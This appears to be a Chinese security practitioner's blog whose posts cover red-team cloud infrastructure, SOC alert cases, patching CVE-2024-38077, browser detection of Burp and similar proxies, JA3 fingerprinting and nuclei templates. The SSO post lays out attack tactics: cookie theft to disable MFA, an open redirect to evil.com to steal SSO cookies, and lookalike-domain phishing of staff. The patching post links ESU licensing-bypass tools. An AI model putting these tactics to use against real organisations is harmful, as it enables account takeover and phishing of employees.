r0fus0d 的博客

About

Sun, 20 Aug 2017 21:38:52 +0800

我是 r0fus0d，一名网络安全行业的打工仔，我会在博客中分享我学习、工作路上的知识点。

工作经历

2018-2023 Red team,红队相关的研究和实现
2024-至今国企，安全运营负责人

开源项目

redc 下一代基础设施管理工具 2025年

redc-template redc的模板项目 2025年

xiasqlpro xiaSql魔改版 2025年

burp_nu_te_gen nuclei模版生成插件 2023年

pathtrim 过滤path路径 2023年

iprange 计算ip范围 2022年

name-fuzz 目标已知信息字典生成工具 2022年

gendict 字典生成工具 2022年

403-fuzz 针对403页面的fuzz脚本 2022年

ones 网络资产测绘引擎API查询工具 2022年

JVWA java代码审计学习靶场 2022年

f8x Red/Blue team environment automation deployment tool 2021年

Pentest101 渗透测试Tips 2021年

postgresql_udf_help PostgreSQL提权辅助脚本 2021年

1earn 安全知识框架 2019年

AboutSecurity 渗透测试payload和bypass字典 2019年

Digital-Privacy 数字隐私保护与osint信息收集 2019年

过往实现的一些项目

自动化部署平台,golang 编写基于terraform调度实现的多云管理项目，真正做到一条命令、一个按钮就能全自动部署cs，frp，supershell，arl 等大量红队服务

被动扫描平台,参考 xray 实现的平台化的，团队协同的漏洞挖掘项目

敏感数据清理,参考 HackBrowserData、LaZagne以及各种各样抓取脚本，你抓啥我就清理啥，用于在已知内网失陷并横向中的情况下，批量下进行敏感数据清理。

应急响应系统,CMDB+SOAR的结合，厂家soar不支持一些安全设备，所以自己通过模拟登录+api实现了个简单平台能联动多环境设备和服务。快速查询、快速封禁。(涉及具体产品名称所以不列举逻辑图了)

联系方式

Email: D2hwakH7BS5E@protonmail.com

关于我的更多项目可以访问我的 GitHub.

欢迎关注我的公众号

友情链接

抢占式实例的自动监控与恢复

Thu, 12 Mar 2026 11:00:00 +0800

info

文章内所有功能 redc 已支持

抢占式实例的自动监控与恢复

这个问题的背景

搞红队基础设施的都知道，云上资源开销是个绕不过去的问题。一个代理池场景随随便便就是好几台 ECS，按量计费一天下来费用不低。后来我们在 RedC 里把阿里云和 AWS 的代理场景全部切到了抢占式实例（Spot Instance），成本直接砍掉 60%～90%，效果立竿见影。

但抢占式实例有个众所周知的问题：它随时可能被云厂商回收。

实际遇到

有一天，我开了个阿里云的代理池场景，几十台抢占式 ECS，跑着跑着其中部分被回收了。直到发现代理可用率掉了一半才上控制台看——原来是被释放了。

这就引出了两个很现实的问题：

怎么知道实例被回收了？ 云厂商的中断通知机制各不相同，有的要接 API，有的要轮询元数据服务，而且只能在实例内部获取。对于一个管理多个场景、跨多个云厂商的工具来说，逐一对接太碎片化了。
知道了之后怎么办？ 手动上去重新开？那还不如用按量的。能不能自动把被回收的实例补回来？

思路：不依赖云厂商通知，从外部探测

一开始想的是去对接各个云厂商的中断通知 API，但想了想放弃了。原因：

阿里云的抢占式实例中断事件可以通过 CloudMonitor 事件订阅拿到，但需要额外配置事件规则、回调地址
AWS 可以用 EventBridge 监听 Spot 中断警告，也挺麻烦
腾讯云、火山引擎各有各的接口

这些方案对一个本地运行的 GUI 工具来说，太重了。

换个角度想——抢占式实例被回收之后，最直观的表现是什么？就是机器没了，连不上了。

所以最终选了一个最简单粗暴的方案：定期 TCP 探测 SSH 端口。每隔一段时间，对所有运行中的 Spot 场景的公网 IP 做一次 22 端口探测。连不上，就说明实例大概率已经被回收了。

这个方案的好处是：

不依赖任何云厂商的特定 API
不需要在实例内部装 agent
对 RedC 已有的场景管理结构完全兼容

坏处也有——不够实时，探测间隔决定了你最晚多久能发现。不过对我们的场景来说，3 分钟的延迟完全可以接受。

具体怎么做的

整体架构

监控模块作为一个后台常驻 goroutine 运行，启动后按固定间隔执行扫描。流程大概是这样：

启动监控 → 等待 60s（让应用初始化完）→ 每 3 分钟扫描一轮
    ↓
遍历所有运行中的场景
    ↓
检查 .tf 文件是否包含 spot 相关配置（spot_strategy / market_type / is_spot_instance）
    ↓
从 terraform output 中提取公网 IP
    ↓
对每个 IP 做 TCP :22 探测（3 次重试，每次超时 10s，间隔 15s）
    ↓
连不上 → 标记为已回收 → 发送通知 → 触发自动恢复

怎么判断一个场景是 Spot 实例

不是所有场景都用了抢占式实例，所以第一步是识别。做法很简单——扫描场景目录下的 .tf 文件，看有没有这几个关键字：

spotPatterns := []string{
    `spot_strategy`,    // 阿里云
    `market_type`,      // AWS
    `is_spot_instance`, // 腾讯云
}

阿里云的 Spot 实例在 Terraform 里长这样：

resource "alicloud_instance" "instance" {
  instance_type              = "ecs.n1.tiny"
  spot_strategy              = "SpotWithPriceLimit"
  // ...
}

AWS 的则是：

resource "aws_instance" "pte_node" {
  instance_type = "t4g.nano"
  instance_market_options {
    market_type = "spot"
  }
  // ...
}

通过静态文本匹配就能判断，不需要调用云 API。

SSH 探测的细节

探测逻辑做了一些容错处理：

func (m *SpotMonitor) probeSSH(ip string) bool {
    addr := net.JoinHostPort(ip, "22")
    for attempt := 0; attempt < 3; attempt++ {
        conn, err := net.DialTimeout("tcp", addr, 10*time.Second)
        if err == nil {
            conn.Close()
            return true
        }
        if attempt < 2 {
            select {
            case <-time.After(15 * time.Second):
            case <-m.stopCh:
                return true // 正在停止，避免误报
            }
        }
    }
    return false
}

一次连不上不算数，连续 3 次都连不上才判定为回收。每次超时 10 秒，重试间隔 15 秒。这样单个 IP 的判定周期大约是 1 分钟，能有效过滤掉网络抖动导致的误报。

另外一个细节是 alerted 机制——已经报过警的 IP 不会重复报。用 caseID:ip 作为 key 记录，避免每一轮扫描都重复告警同一个已挂的实例。

自动恢复

检测到实例被回收后，如果用户开启了自动恢复选项，会触发 Terraform 的 plan + apply 操作。Terraform 的声明式特性在这里很好用——你声明了要 2 台实例，现在只剩 1 台，apply 一下自然会把缺的那台补回来。

但这里踩了一个坑。

RedC 里，场景启动后状态是 running，而 TfApply() 方法内部有一个状态检查：如果当前状态已经是 running，会直接拒绝执行并返回错误”场景正在运行中”。这个检查本来是防止用户误操作的，但在自动恢复场景下就有点碍事。

解法是绕过上层封装，直接调用底层的 TfPlan() 和 TfApply() 函数：

func (m *SpotMonitor) attemptRecover(c *redc.Case, downIPs []string) {
    // 直接调用底层函数，绕过 Case.TfApply() 的状态检查
    if err := redc.TfPlan(c.Path, c.Parameter...); err != nil {
        // 恢复失败，发通知
        return
    }
    if err := redc.TfApply(c.Path, c.Parameter...); err != nil {
        // 恢复失败，发通知
        return
    }

    // 如果之前标记了 terminated，改回 running
    if c.State == redc.StateTerminated {
        c.StatusChange(redc.StateRunning)
    }
    // 清除该场景的告警记录，让新 IP 可以被监控
    m.ResetAlert(c.Id)
}

恢复成功后，还要做一件事：清除该场景的告警记录（ResetAlert）。因为恢复后实例的 IP 会变，旧 IP 的告警记录已经没意义了，而新 IP 需要能被正常监控。

实现效果如下

开启 spot 实例监控

开个场景，验证一下，这里一台 214，一台 222

手动把 214 释放掉

过一会，自动把 214 那台重新开启，222 未受到影响，场景恢复

通知集成

系统通知：macOS / Windows / Linux 原生桌面通知，适合人在电脑前的场景
Webhook 推送：支持 Slack、钉钉、飞书、Discord、企业微信，适合团队协作或不在电脑前的场景

通知内容包括场景名、被回收的 IP、是否全部回收、自动恢复结果等。

做成可选项

因为 Spot 监控需要持续做 TCP 探测，对于不用抢占式实例的用户来说是没必要的开销。所以把它做成了设置页面里的一个开关，默认关闭，用的时候再打开。自动恢复也是单独的开关，可以只开监控不开恢复。

配置存在本地的 gui_settings.json 里，重启不丢失。

实际效果

目前这套方案，有几个实际的体验：

阿里云的抢占式 ECS 被回收后，大约 3 分钟内能检测到并触发恢复，新实例通常在 2 分钟内就起来了。整个中断窗口大约 5 分钟。
AWS 的 Spot Instance 同理，探测 + 恢复的总时间差不多。
代理池场景里如果 2 台实例只回收了 1 台，Terraform apply 只会补那 1 台，不会影响另一台正在运行的实例，代理可用率不会归零。

对于红队基础设施的场景来说，这个恢复速度基本够用。

当然如果场景可用性要求特别高（比如不能断超过 1 分钟），那还是老老实用用按量实例把。

小结

不去对接各云厂商的中断通知，用 TCP 端口探测作为统一的健康检查手段
利用 Terraform 的声明式特性，apply 一下就能把被关闭的实例补回来
通知做多层覆盖，确保不会错过

简单对齐与复杂画图

Tue, 17 Dec 2024 23:46:00 +0800

工作以前我对画图，画各种图的概念还停留在用思维导图，用ps，用 visio，参与工作后发现有各种各样的画图需求

当前的环境与工作内容复杂，弄个思维导图理一理
当前开发的工作功能变多了，有哪些功能点和场景，列一列
手头负责的系统各功能模块之前是怎么协同的，梳理一下
要设计的系统具有什么样的业务/技术架构，画个图表示表示
这个技术原理是什么，能不能画个图展示
画个拓扑图

用的软件也不多，讲讲现有的几个用的顺手的

drawio

https://github.com/jgraph/drawio-desktop

在我懒得装visio后，发现这么个神器，有开源，体积还下，还有 web 端支持，简直完美

用它画了不少网络拓扑，还有一些攻击路线梳理

画协议中的格式

画认证流程

无聊的时候还用它来画火箭

就是要对一些细节多微调，没啥大问题

xmind

导图工具免费版感觉够用，平常遇到复杂棘手的事，用导图梳理一下，往往就能找到关键问题

ppt

ppt 用来画一些方案类的图到时不错，有时候需要画一些色彩丰富的，或者内容较多但较为整齐的，用 ppt 也顺手

d2

https://github.com/terrastruct/d2

最近看科技爱好者周刊发现，对于一些示意图有D2 会比较方便

官方也列出了一些d2 的使用案例,可以参考学习 https://github.com/terrastruct/d2#notable-open-source-projects-documenting-with-d2

部分告警场景分享

Wed, 04 Sep 2024 12:00:00 +0800

列举遇到的一些告警场景，不涉及具体业务。

未遵守规范

登录账号同步 chrome 设置，把家里电脑装的 MetaMask 插件同步到办公电脑上，然后每次开浏览器都触发访问交易所的 dns 请求，导致一直报挖矿告警。
xff头未正确配置导致告警为内对内大量扫描，其实上是网关转发到后端，外对内。
大型多人运动项目期间弱口令检查，由于基础镜像配置有默认用户导致内网存在大量通用弱口令，负责人统一改了弱密码，但没有同步给业务，导致业务登录不上，触发大量爆破告警。
以前应急用 github 上应急扫描工具 Gscan 排查，用完没删，后面防病毒将其判断成病毒文件。
用 kms 激活，然后扔到回收站，结果没有清理回收站，被全盘扫描扫描出来告警。
下载wireshark太慢，搜了个中文版wireshark。。。

操作失误

开发登录代码平台，走的是域认证，输入错误密码，多点了几次，导致 ldap 爆破告警。
ssh登录操作时复制错了，将密码直接明文粘贴到终端中回车了，导致 histroy 历史记录了 ssh 密码，然后运行了 history -c 清理了历史记录，导致触发清理历史记录告警。

逻辑互斥

垃圾邮件网关会验证邮件 SPF/DKIM/DMARC 所以会发出多个 DNS 请求，当触发恶意域名查询请求会导致 dns 安全产品告警。
主机上多个安全软件打架，某杀毒软件进行定时任务触发的文件蜜罐访问导致告警。
主机上单个安全产品，防病毒功能全盘扫描扫到自己文件蜜饵触发的告警。

无辜中枪

通报 chrome 浏览器漏洞情报，赶紧更新chrome，结果 bing 搜索到银狐的仿冒 chrome-web 站点，访问导致告警。

CVE-2024-38077 打补丁补充

Mon, 12 Aug 2024 12:00:00 +0800

某大型多人运动已展开数周，由于0day 通报，估计大家都在忙着打CVE-2024-38077的补丁

自己在打补丁时遇到了一些坑，在此补充打补丁的一些信息

前置补丁和目标补丁

直接下载目标补丁是不能装的，得安装前置补丁

windows server 2008
kb5039341 --> KB5040490

windows server 2008 R2
kb4474419 --> kb5039339 --> KB5040498

windows server 2012
KB5040570 --> KB5040485

windows server 2012 R2
KB5040569 --> KB5040456

windows server 2016
kb5040562 --> KB5040434

windows server 2019
kb5005112 --> KB5040430

下载方法，访问 https://catalog.update.microsoft.com/home.aspx 搜对应的 KB号,找相应系统的包

08/12系统打不上的 bypass 方案

有人开阿里云 win08 验证打补丁方案，这个和实际场景是不一样的，阿里云的 08 是自带的 ESU 的，但是实际生产环境里除非用破解方案不然不带 ESU 是打不上的。

BypassESU-v12_u.7z

Windows 7 和 Server 2008 R2 ESU 更新绕过工具

https://forums.mydigitallife.net/threads/bypass-windows-7-extended-security-updates-eligibility.80606/

BypassESU-Blue-v2.7z

Windows 8 and Server 2012 R2 ESU 更新绕过工具

https://forums.mydigitallife.net/threads/bypass-esu-blue.86548/

代理检测

Sat, 01 Jun 2024 12:00:00 +0800

info

书接上文 https://r0fus0d.blog.ffffffff0x.com/post/webrtc/ 来看看检测 bp/代理访问有哪些方法

burp favicon

http://burp/favicon.ico 路径有 icon 图标

检测方式

<h2 id='indicator'>Loading...</h2>
<script>
    function burp_found() {
        let e = document.getElementById('indicator');
        e.innerText = 'Burp FOUND !!!';
    }

    function burp_not_found() {
        let e = document.getElementById('indicator');
        e.innerText = 'Burp not found.';
    }
</script>
<img style="display: none;" src='http://burp/favicon.ico' onload='burp_found()' onerror='burp_not_found()'/>

用 heimdallr 可以阻断请求

也可以在 Proxy -> Options -> Miscellaneous 中勾选 Disable web interface at http://burp

或者是删除 jar 包中的 favicon.ico

`1`	`zip -d burpsuite_pro.jar "resources/Media/favicon.ico"`

burp 导出证书接口

http://burp/cert 是下证书的接口

检测方法类似

<h2 id='indicator'>Loading...</h2>
<script>
    function burp_found() {
        let e = document.getElementById('indicator');
        e.innerText = 'Burp FOUND !!!';
    }

    function burp_not_found() {
        let e = document.getElementById('indicator');
        e.innerText = 'Burp not found.';
    }
</script>
<script style="display: none;" src='http://burp/cert' onload='burp_found()' onerror='burp_not_found()'></script>

可以在 Proxy -> Options -> Miscellaneous 中勾选 Disable web interface at http://burp

报错页面

除此上面 2 种之外，还有个广为流传的检测方法，就是访问个不存在的页面

正常浏览器

挂了 burp 后

网上的一种检测方式

<h2 id='indicator'>Loading...</h2>
<script>
    function burp_found() {
        let e = document.getElementById('indicator');
        e.innerText = 'Burp FOUND !!!';
    }

    function burp_not_found() {
        is_burp_not_found = true;
        let e = document.getElementById('indicator');
        e.innerText = 'Burp not found.';
    }
</script>
<script>
    fetch('http://not_exists_domain/not_exist', {method: 'GET', mode: 'no-cors'}).then((r)=>{burp_found();}).catch((e)=>{burp_not_found();});
    // 200 -> fetch 成功, 触发 then, burp 存在. 超时 -> fetch 失败, 触发 catch, burp 不存在.
</script>

不知道在哪里看到的修复方案，在 Proxy -> Options -> Miscellaneous 中勾选 Suppress Burp error messages in browser

然而，实际测试，发现就算勾选了502也是一样检测出有 burp

所以，为啥 502 也是检测成功呢？原因就是这个检测脚本有 bug

顺便一提，edge 不走代理，默认也是返 502

要是用这方法实际部署检测，那误报会有点多

我理解，旧版本 burp 在访问不存在的地址时可能会返 200，但随着 burp 版本迭代，这个检测方法失去了通用性

浏览器扩展判断(burp)

在console可以通过输入navigator.plugins来获取扩展信息

但是这无法用来获取插件信息，那么如何判断浏览器安装的扩展信息呢?

比如在burp自带的chromium中，默认就安装并启用了扩展Burp Suite

我们如何判断访问者是否安装这个扩展呢，经过搜索不难得知，我们可以通过判断扩展的资源是否存在来确认

比如

var extensionid = '扩展的id';
 
var image = document.createElement('img');
image.src = 'chrome-extension://' + extensionid + '/icon.png';
image.onload = function () {
    setTimeout(function () {
        alert('installed-enabled');
    }, 2000);
};
image.onerror = function () {
    alert('not-installed');
};

当'chrome-extension://' + extensionid + '/icon.png'路径的资源存在时，我们便可以认为目标安装了burp插件

找找burp插件默认有哪些资源

可以，就'chrome-extension://' + extensionid + '/images/BurpSuite-Container-16.png'路径即可

测试一下

搜下报错，原来扩展的web_accessible_resources配置控制着扩展可被外部页面访问的资源

看下burp manifest.json的web_accessible_resources配置

找个可以访问

<!DOCTYPE HTML>
<html>
<body>
<script>
var extensionid = 'mjkpmmepbabldbhphljoffinnkgncjkm';
 
var image = document.createElement('img');
image.src = 'chrome-extension://' + extensionid + '/images/BurpSuite-Container-16.png';
image.onload = function () {
    setTimeout(function () {
        alert('installed-enabled');
    }, 2000);
};
image.onerror = function () {
    alert('not-installed');
};
</script>
</body>
</html>

同理，对其他扩展的检测也可以这么做

burp本地插件的id是随机的😅,但是其他本地插件不是比如Heimdallr

当然如果硬是要多找几种检测指定扩展的方法，不如直接搜 “如何检测adblock” 将其思路进行运用😙

浏览器扩展判断(Heimdallr)

这个和burp有点不同，因为content.js是js文件不能当图片进行加载判断

<!DOCTYPE HTML>
<html>
<body>
<script>
var extensionid = 'kkggffkhdfcdcijcokeoajakgilejmka';

var script = document.createElement('script');
script.src = 'chrome-extension://' + extensionid + '/resource/inject/content.js';
document.getElementsByTagName('head')[0].appendChild(script);
script.onload = function () {
    alert('检测到安装Heimdallr');
};
script.onerror = function () {
    alert('not-installed');
};
</script>
</body>
</html>

时间一致性

https://proxy.incolumitas.com/proxy_detect.html?loc=us

对比访问 IP时区与浏览器时区来判断是否是通过代理访问

如果检测是代理池/vpn会有用，如果检测是 bp 可能没啥用

Yakit favicon

和 bp 类似

http://mitm/static/favicon.ico

<h2 id='indicator'>Loading...</h2>
<script>
    function yakit_found() {
        let e = document.getElementById('indicator');
        e.innerText = 'yakit FOUND !!!';
    }

    function yakit_not_found() {
        let e = document.getElementById('indicator');
        e.innerText = 'yakit not found.';
    }
</script>
<img style="display: none;" src='http://mitm/static/favicon.ico' onload='yakit_found()' onerror='yakit_not_found()'/>

Yakit 导出证书接口

和 bp 类似

http://mitm/download-mitm-crt

<h2 id='indicator'>Loading...</h2>
<script>
    function Yakit_found() {
        let e = document.getElementById('indicator');
        e.innerText = 'Yakit FOUND !!!';
    }

    function Yakit_not_found() {
        let e = document.getElementById('indicator');
        e.innerText = 'Yakit not found.';
    }
</script>
<script style="display: none;" src='http://mitm/download-mitm-crt' onload='Yakit_found()' onerror='Yakit_not_found()'></script>

xray 导出证书接口

和 bp 类似

http://proxy.xray.cool/ca.crt

<h2 id='indicator'>Loading...</h2>
<script>
    function Xray_found() {
        let e = document.getElementById('indicator');
        e.innerText = 'Xray FOUND !!!';
    }

    function Xray_not_found() {
        let e = document.getElementById('indicator');
        e.innerText = 'Xray not found.';
    }
</script>
<script style="display: none;" src='http://proxy.xray.cool/ca.crt' onload='Xray_found()' onerror='Xray_not_found()'></script>

查看域控 DNS 服务器上面的 dns 解析日志

Thu, 21 Mar 2024 12:00:00 +0800

一个实际场景，soc 上告警有挖矿连接事件，特征是访问到了矿池 dns，但是源 ip 却是域控 dns 的 ip，那得想办法定位 pc 记录

info

gpt给出的回答不是很靠谱，一开始按照方案做，日志文件都是空的

找了微软官方的文档里的解决方案才可以看到实际请求记录

正确使用

eventvwr.msc，打开事件查看器

在事件查看器中，导航到“应用程序和服务日志”\“Microsoft”\“Windows”\“DNS-Server”。

右键单击“DNS-Server”，指向“视图”，然后单击“显示分析和调试日志”。

右键单击“分析”，然后单击“属性”。

在“达到最大事件日志大小时”下，选择“不覆盖事件（手动清除日志）”，选中“启用日志记录”复选框，并在系统询问是否要启用此日志时单击“确定”。

再次单击“确定”以启用 DNS 服务器分析事件日志。

这样 pc 查 dns 的记录就有了

默认情况下，分析日志将写入以下文件：%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-DNSServer%4Analytical.etl。

Source & Reference

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn800669(v=ws.11)

sso 打法和思路

Sun, 10 Mar 2024 12:00:00 +0800

info

首发于 wgpsec 团队内部培训

sso打法/手段思考

运营角度

sso 的建设、系统接入改造毕竟是需要成本的既然目标使用了 sso 那么说明对很大程度上是说明有不小的公司规模

社工

目标员工的在使用sso的账号通常要么为工号要么为员工姓名缩写甚至手机号
可以从员工在互联网侧泄露的信息入手，例如微博、抖音、小红书、社工库，搜集目标公司人员的相关信息构造字典进一步利用

有意开白的接口

实际我接触的公司业务中的 sso，可能收敛了 oa 系统在 sso 后面，比如你访问 oa，自动 302 到 sso 系统但是实际上该 oa 系统有不少 api 是单独开白访问的，不需要经过 sso

举个例子买的云上销售数据分析服务要从 oa 系统某个接口拉数据同步，它咋自动走 sso 认证？所以后台在 sso 配置中单独对该 oa 的部分路径比如 api，比如静态资源进行了放行

那么当攻击者对这些 api 接口的漏洞进行利用时，其实就是绕过了 sso 的认证撕开了口子

直接访问,直接 302 到 sso

访问开白的 api，不会被重定向到 sso

开发角度

从系统实现上看

前面提到了sso 的建设、系统接入改造是需要成本的那么自建的情况下，开发人员往往是会从开源社区中寻求解决方案比如比较成熟的，cas，或者 spring+shiro 这种形式,这种就是看框架漏洞利用面如果纯自己实现那么可能就会出现各种奇奇怪怪的漏洞点

找回密码等功能点的逻辑漏洞

常规的注入、未授权访问、前端校验就和正常登录点一样测

多身份源

较大的企业，其 sso 系统登录时支持的认证来源也会比较丰富这些不同渠道的认证账密也是一个利用的思路比如你在内网域里，想控 sso，就可以通过拿域管账号的方式去控 sso

otp/mfa

除了手机验证码外，可能业务会自己开发 otp 的应用，甚至一键扫码进行登陆往往自研的系统都搭配自研的 otp 应用如果自研的 otp 应用本身安全性不到位，也会存在被攻击的点，比如攻击者反编译后伪造 token，或者重放 token

还有些终端的场景，比如控了机器，抓浏览器账号密码，发现有 mfa，有账号密码就是登录不了这种情况可以尝试抓 cookie，通过 cookie 去调用 api 去关自己账号的 mfa，然后登录上去在自己绑定,完成敏感操作

钓鱼角度

跳转参数

很多sso是登录sso跳转到子站点的功能逻辑

例如如下跳转特定业务url

https://sso.test.com/tologin?redirect=https://evil.com/

当redirect参数跳转url无校验时，我们可以将其改为自己的域名构造恶意链接钓鱼从而获取目标的sso cookie，登陆特定业务

三方iam认证钓鱼

sso 是需要存认证数据的，当企业人员规模特别大的时候，就会考虑一个叫 iam 的业务

可以这么理解，sso 负责登录、注册、密码找回这些具体功能点实现，iam 负责认证账号、密码这些具体数据当然有的iam 业务做的比较大，sso 的功能都包了进去

常见的 iam 国内比如 authing、派拉、雪诺、竹云国外就是 okta、auth0

一方面从这些厂商产品角度出发，可以挖掘厂商产品的漏洞另一方面，企业员工在用这些第三方业务认证时常常会忘记密码，这时，忘记密码的邮件是由第三方业务的官方域名发给企业员工的邮箱或者 im 上的，这里就可以尝试购买与厂商类似的域名发钓鱼邮件

例如: authing,他本身发邮件用的域名就是 .co 官方的看上去都感觉像是钓鱼邮件的后缀

我找了个类似authing的域名，然后用ewomail进行搭建,格式如下，钓了波公司里的人，上钩率很高。

剩下几个案例就放个拓扑吧，具体图不放了,码不好打

nuclei 模板编写踩坑

Mon, 25 Sep 2023 12:00:00 +0800

一点吐槽

yaml格式

多一个空格都不行，真的很严格

请求合并

请求合并是非常优秀的功能，但是在部分场景下会无法合并,例如

http:
  - method: GET
    path:
      - "{{BaseURL}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

又例如

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

http:
  - method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}/aaa"

    host-redirects: true
    max-redirects: 2

workflow的请求合并

在workflow的扫描流程中

即使finger的扫描请求完全一致，请求也是拆分出来的，无法自动合并，估计是实现逻辑上的问题。

id: test1-workflow

info:
  name: test1 workflow
  author: aaaa

workflows:
  - template: /tmp/test1-detect.yaml
    subtemplates:
      - template: /tmp/test1/

id: test2-workflow

info:
  name: test2 workflow
  author: aaaa

workflows:
  - template: /tmp/test2-detect.yaml
    subtemplates:
      - template: /tmp/test2/

id: test1-detect

info:
  name: test1-detect
  author: aaa
  severity: info
  tags: tech

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

id: test2-detect

info:
  name: test2-detect
  author: aaa
  severity: info
  tags: tech

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

变量解析

之前遇到的问题了

提的issue

requests:
  - method: GET
    path:
      - "{{BaseURL}}/{{123123}}"
      - "{{BaseURL}}/{{aaabbb}}"
      - "{{BaseURL}}/{{123*123}}"
      - "{{BaseURL}}/{{123!123}}"

主要在于解析的情况不一致

https://github.com/projectdiscovery/nuclei/issues/1497

后面在版本更新中得以解决

低质量 wordpress cve poc

怎么这么多人喜欢刷这种低质量的cve编号

关键是怎么还就有人喜欢写这种低质量漏洞的poc,闲的蛋疼吗。。。

总结

nuclei无疑是近年来安全行业最火热的工具之一，这也和其开发团队的努力脱不开联系，就以外网打点，漏洞扫描来看，不说自己二开、集成，就能把模板自己写写，优化好误报漏报，其实就能发挥很大的威力了。

最后推荐下官方的和我的burp插件，用来辅助编写模板

nuclei-burp-plugin

https://github.com/projectdiscovery/nuclei-burp-plugin

nu_te_gen

https://github.com/ffffffff0x/burp_nu_te_gen

浅谈 ja3

Tue, 12 Sep 2023 10:00:00 +0800

ja3是蓝队的好朋友

什么是ja3

JA3 是一种 TLS 指纹识别方法

ja3 由 ClientHello 的版本、可接受的加密算法、扩展列表中的每一个 type 值、支持的椭圆曲线和支持的椭圆曲线格式 生成

如何计算ja3值

计算ja3值，也就是提取客户端发送的 TLS 握手包的 Client Hello 部分的 Version/Cipher Suites/Extensions 值，再 md5 一下

在https://github.com/salesforce/ja3项目中提供了计算指定pcap包里tls指纹的工具

这里我抓取一下本地burp访问随便一个ip的tls握手包，计算一下看看

git clone https://github.com/salesforce/ja3
cd ja3/python

python3 ja3.py test.pcap

wireshark也很贴心的提供了ja3的值,直接找到握手包展开详情就可以看到

1
2

[JA3 Fullstring [truncated]: 771,4866-4865-4867-49196-49195-52393-49200-52392-49199-159-52394-163-158-162-49188-49192-49187-49191-107-106-103-64-49198-49202-49197-49201-49190-49194-49189-49193-49162-49172-49161-49171-57-56-51-50-49157-49167-49156-49166-157-156-61-60-53-47-49160-49170-22-19-49155-49165-10-255,5-10-11-17-23-35-13-43-45-50-51,29-23-24-25-30-256-257-258-259-260,0]
[JA3: dc44ae2eaf1dba93fa619c437fb20ca4]

这里也可以手动计算一下，看看具体的实现

先看下这个包的 Version + Cipher Suites

依次为转换为16进制为

`1`	`771 4866 4865 4867 49196 49195 52393 后面略。。`

再看下 Extensions 部分

对应的第二段

`1`	`5-10-11-17-23-35-13-43-45-50-51`

最后，再看到Extension: supported_groups

`1`	`29-23-24-25-30-256-257-258-259-260`

最后的最后，看到Extension: ec_point_formats

组合起来就是

771,4866-4865-4867-49196-49195-52393-49200-52392-49199-159-52394-163-158-162-49188-49192-49187-49191-107-106-103-64-49198-49202-49197-49201-49190-49194-49189-49193-49162-49172-49161-49171-57-56-51-50-49157-49167-49156-49166-157-156-61-60-53-47-49160-49170-22-19-49155-49165-10-255,5-10-11-17-23-35-13-43-45-50-51,29-23-24-25-30-256-257-258-259-260,0

md5一下

与ja3.py和wireshark计算的结果一致

当我们用burp访问其他的站点时，如果抓取握手包，会发现，由于上述几个TLS 握手包的 Client Hello 部分不变，所以其ja3指纹是一致的，这也就是识别burp的一种方式，或者说特征

如下，换个目标访问,可以看到ja3结果一致

不同的软件所使用的 TLS 库是不同的，所以对于Cipher Suites和Extension的一些配置和支持也肯定不同，同时其位置顺序也会影响ja3结果的生成，所以通过 ja3 特征识别恶意客户端行为是waf、ips等安全设备的一个比较有效的识别/拦截手段。

大量客户端工具ja3指纹的维护，较为麻烦，比如webshell连接，c2连接，目前github上也没啥开源的ja3指纹库，但基于常见工具+常见编程语言版本+默认配置维护一个黑名单库，还是有价值的。

上述计算ja3指纹的方法是针对指定包进行处理的工具，如果要监听一个接口，持续不断的计算ja3指纹，那么推荐https://github.com/Macr0phag3/ja3box这个工具

`1`	`sudo python ja3box.py -i eth0`

sni

在文章https://mp.weixin.qq.com/s/Cha_hTGOh-GGVkaZRdFujw中,提到了域名访问和IP访问存在2个不同的ja3指纹，原因是域名有sni和ip无sni。

随便抓个包测试下,通过域名访问

1
2

771,4866-4865-4867-49196-49195-52393-49200-52392-49199-159-52394-163-158-162-49188-49192-49187-49191-107-106-103-64-49198-49202-49197-49201-49190-49194-49189-49193-49162-49172-49161-49171-57-56-51-50-49157-49167-49156-49166-157-156-61-60-53-47-49160-49170-22-19-49155-49165-10-255,0-5-10-11-16-17-23-35-13-43-45-50-51,29-23-24-25-30-256-257-258-259-260,0
dfd0bc4a6d8c21e500d6be9121fd44d7

通过ip访问

1
2

771,4866-4865-4867-49196-49195-52393-49200-52392-49199-159-52394-163-158-162-49188-49192-49187-49191-107-106-103-64-49198-49202-49197-49201-49190-49194-49189-49193-49162-49172-49161-49171-57-56-51-50-49157-49167-49156-49166-157-156-61-60-53-47-49160-49170-22-19-49155-49165-10-255,5-10-11-17-23-35-13-43-45-50-51,29-23-24-25-30-256-257-258-259-260,0
dc44ae2eaf1dba93fa619c437fb20ca4

可以发现，多出来2个，一个0，一个16，wireshark查看对应的Extensions

其中Extension: server_name为sni信息,点开可以看到是访问的目标域名，所以这个在ip访问的时候是没有的。

在维护内部ja3黑名单库时，无需考虑域名结果，只需考虑ip访问结果即可，因为计算ja3时，可以忽略sni的部分,也就是通过域名访问的client hello包,忽略Extension: server_name和Extension: application_layer_protocol_negotiation2个部分，也可以计算出ip访问的ja3值。

curl

curl是比较常见的命令行网络访问请求工具，我们来看下它的ja3值

在linux上curl 7.64.0的ja3值如下

域名
771,4866-4867-4865-49196-49200-159-52393-52392-52394-49195-49199-158-49188-49192-107-49187-49191-103-49162-49172-57-49161-49171-51-157-156-61-60-53-47-255,0-11-10-13172-16-22-23-49-13-43-45-51-21,29-23-30-25-24,0-1-2
f436b9416f37d134cadd04886327d3e8

ip
771,4866-4867-4865-49196-49200-159-52393-52392-52394-49195-49199-158-49188-49192-107-49187-49191-103-49162-49172-57-49161-49171-51-157-156-61-60-53-47-255,11-10-13172-16-22-23-49-13-43-45-51-21,29-23-30-25-24,0-1-2
0d85f6adde9dc6aa98804d6cfa2f90c1

在mac上curl 7.84.0的ja3值如下

域名
771,4867-4866-4865-52393-52392-52394-49200-49196-49192-49188-49172-49162-159-107-57-65413-196-136-129-157-61-53-192-132-49199-49195-49191-49187-49171-49161-158-103-51-190-69-156-60-47-186-65-49169-49159-5-4-49170-49160-22-10-255,43-51-0-11-10-13-16,29-23-24-25,0
